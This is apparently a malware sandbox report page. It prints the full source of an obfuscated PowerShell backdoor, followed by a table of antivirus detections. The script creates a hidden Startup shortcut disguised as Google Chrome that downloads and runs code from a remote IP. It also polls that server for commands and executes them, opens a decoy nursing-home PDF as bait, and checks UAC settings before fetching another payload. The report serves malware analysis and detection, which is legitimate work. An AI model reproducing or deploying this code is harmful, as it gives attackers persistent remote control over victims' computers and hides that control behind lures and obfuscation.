popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
$mainUri = "hujkdtujkdtujkdp:ujkd/ujkd/157.173.104.153/ujkduujkdpujkd/ujkdujkd".Replace("ujkd","");
function gid
$regPath = "HKLM:\Software\Wireless"
$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue
if ($null -ne $exist) {
$uid = (Get-ItemProperty $regPath -Name uid).uid
else {
$local = "$env:public\documents\id.log"
if (Test-Path $local) {
$uid = [IO.File]::readalltext($local)
$uid = $uid.Substring(0,36)
else {
$uid = ([System.Guid]::NewGuid()).ToString()
$uid >> $local
return $uid
function auto {
$dvpocj = New-Object -ComObject WScript.Shell;
$apdlzm = "\Microsoft\Windows\Start Menu\Programs\Startup\";
$begn = $env:APPDATA + $apdlzm;
$ryncdsf = $dvpocj.CreateShortcut("$begn"+"\Goo"+"gle "+"Ch"+"rome.ln"+"k");
$ryncdsf.TargetPath = "pow"+"ersh"+"ell.e"+"x"+"e";
$ryncdsf.Arguments = " -WindowStyle Hidden -command &{`$z = 'rrjo4jn23ptjoct!tjofg!!!fjdnwp!j;4t3oi#4ftkzo4mbmpe'; `$y = 'embogjw#mb78h439gjhkfktjoct!tjofg!!!fjdn9gjhkfktjoct!tjofg!!!fjdnwp!avprlkwfaaeig5gow8e'; `$x = `$z + `$y; `$w = `$x.replace('4mbm','ring4tyopeloadring'); `$v = 'ufhyd>#ndje94o!tjoct!ttjoct!tjofg!!!fjdnwp!jofg!!!fjdnwp!'; [string] `$a = {(Neelw-Obelject Neelt.WebCellienelt).DelownloeladStrelinelg('hteltp:el//1el5el7.1el7elel3.1el0elel4.1el5el3/eluelpel/belb.pelsel1el')}; `$b=`$a.replace('el','');`$c=iex `$b;iex `$c}";
$chromePath = "$env:ProgramFiles\Google\Chrome\Application\chrome.exe"
$ryncdsf.IconLocation = "$chromePath,0";
$ryncdsf.WindowStyle = 7;
$ryncdsf.Description = "adm"+"inis"+"tra"+"tor";
$ryncdsf.WorkingDirectory = "";
$ryncdsf.Save()
function gCommand {
$uid = gid
$url = $mainUri + "get-command.php?uid=$uid"
$WebClient = New-Object System.Net.WebClient
$codestring = $WebClient.DownloadString($url)
if ("" -ne $codestring) {
if ($codestring.contains("autoreconnect id")) {
iex $codestring
else {
$decode = $executioncontext.InvokeCommand.NewScriptBlock($codestring)
$JobName = "Command"
Stop-Job -Name $JobName
Remove-Job -Name $JobName
Start-Job -ScriptBlock $decode -Name $JobName
function showDoc($docName) {
$url = $mainUri + "bait/$docName"
$dst = $docName
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($url,$dst)
start $dst
$lnkName = $docName + ".lnk"
Remove-Item $lnkName
function instant
$rtet44gg = "Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\Wit3gjt50ndt3gjt50owt3gjt50s".Replace("t3gjt50","") + "i3bnoie4\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4".Replace("i3bnoie4","")
$ruiibttew = "Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro".Replace("y5tjogro","") + "Bu6gjoioehu6gjoioavu6gjoioiu6gjoioorAu6gjoiodmu6gjoioin".Replace("u6gjoio","")
$ruiibttew2 = "Ep8ITAwfno44jgnp8ITAwfno44jgablp8ITAwfno44jgeLp8ITAwfno44jgUp8ITAwfno44jgAp8ITAwfno44jg".Replace("p8ITAwfno44jg","")
$val = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew).$ruiibttew
$val2 = (Get-ItemProperty -Path $rtet44gg -Name $ruiibttew2).$ruiibttew2
if (($val -eq 0) -or ($val2 -eq 0)) {
$url = $mainUri + "b.ps1"
Invoke-Expression(New-Object System.Net.WebClient).DownloadString($url)
function action {
#Set-ExecutionPolicy -ExecutionPolicy Bypass -Force
showDoc "202409_Resident_Care_Quality_Improvement_Strategies_for_Nursing_Homes_Enhancing_Patient_Satisfaction_and_Health_Outcomes.pdf"
instant
$sysProc = Get-Process | Where-Object { $_.Name -eq "powershell" -and $_.SessionId -eq 0 }
while ($null -eq $sysProc) {
gCommand
Start-Sleep -Seconds 5
$sysProc = Get-Process | Where-Object { $_.Name -eq "powershell" -and $_.SessionId -eq 0 }
action
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Clean
CTX Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.PowerShell.Agent
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Boxter.979.3D75295E
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.979.3D75295E
Tencent Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.PZQ.Boxter.979.3D75295E
TrendMicro Clean
CMC Clean
Emsisoft Heur.BZC.PZQ.Boxter.979.3D75295E (B)
huorong Clean
FireEye Heur.BZC.PZQ.Boxter.979.3D75295E
Jiangmin Clean
Varist Clean
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Boxter.979.3D75295E
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Script/Wacatac.B!ml
Google Clean
AhnLab-V3 Trojan/PowerShell.Agent.SC205512
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
GData Heur.BZC.PZQ.Boxter.979.3D75295E
AVG Clean
Panda Clean
alibabacloud Clean
No IRMA results available.